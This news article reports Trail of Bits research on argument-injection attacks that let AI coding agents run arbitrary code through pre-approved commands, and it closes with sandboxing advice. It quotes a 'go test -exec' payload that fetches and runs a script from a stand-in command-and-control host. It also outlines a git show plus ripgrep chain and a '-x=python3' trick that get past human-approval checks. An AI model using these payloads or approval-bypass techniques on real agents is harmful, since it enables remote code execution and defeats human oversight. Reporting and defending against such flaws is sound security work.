Modern AI agents are increasingly vulnerable to argument injection attacks that bypass human approval systems and enable remote code execution, according to security research from Trail of Bits.
The vulnerability exploits a fundamental architectural flaw in how AI agents handle system command execution, allowing attackers to achieve RCE through seemingly safe, pre-approved commands.
The Design Antipattern Behind the Vulnerability
AI agents commonly execute system commands to automate filesystem operations, code analysis, and development workflows. T
o improve performance and reliability, many systems leverage existing command-line utilities like find, grep, and git rather than reimplementing their functionality.
While this architectural approach offers significant advantages in speed and reduced complexity, it creates a dangerous security trade-off by exposing an argument injection attack surface when user input influences command parameters.
The core problem stems from systems that maintain allowlists of “safe” commands without properly validating argument flags.
Though many agentic systems prevent shell operators like semicolons and pipes by disabling shell execution, they fail to restrict malicious command-line arguments.
This oversight leaves the door open for attackers to inject dangerous parameters into otherwise innocent commands.
Security researchers demonstrated successful one-shot code execution exploits across three different popular AI agent platforms.
In the first scenario, an agent running a CLI-based system allowed the go test command without restriction.
Attackers exploited the -exec flag to inject bash commands and execute arbitrary code: go test -exec 'bash -c "curl c2-server.evil.com?unittest= | bash"'. Since go test was pre-approved, the exploit bypassed human review entirely.
A second attack leveraged both git show and ripgrep against an agent with stricter filtering.
The exploit used git show with format and output flags to create a malicious file with hex-encoded content, then immediately executed it using ripgrep’s pre-bash parameter.
This two-command chain completely circumvented file creation restrictions and human-in-the-loop safety features.
The third attack targeted systems using a facade pattern with tool handlers.
Researchers crafted a prompt that created a malicious Python file, then used file search functionality with the argument -x=python3 to trigger unintended code execution through argument injection.
Trail of Bits recommends that developers prioritize sandboxing as the primary defense mechanism, implementing container-based isolation, WebAssembly sandboxes, or operating system-level restrictions.
For systems unable to implement sandboxing, using the facade pattern with proper argument separators (–) and disabling shell execution provides improved security.
Developers should drastically reduce safe command allowlists and regularly audit command execution paths against resources like GTFOBINS and LOLBINS.
The research highlights that maintaining secure allowlists without sandboxing remains fundamentally flawed.
As the command-line tools that make agents useful contain hundreds of potentially dangerous flag combinations, comprehensive filtering proves impractical.
Security teams must now confront an entirely new challenge: securing dynamic command execution in AI systems while preserving the flexibility that makes them effective.
Cyber Awareness Month Offer: Upskill With 100+ Premium Cybersecurity Courses From EHA's Diamond Membership: Join Today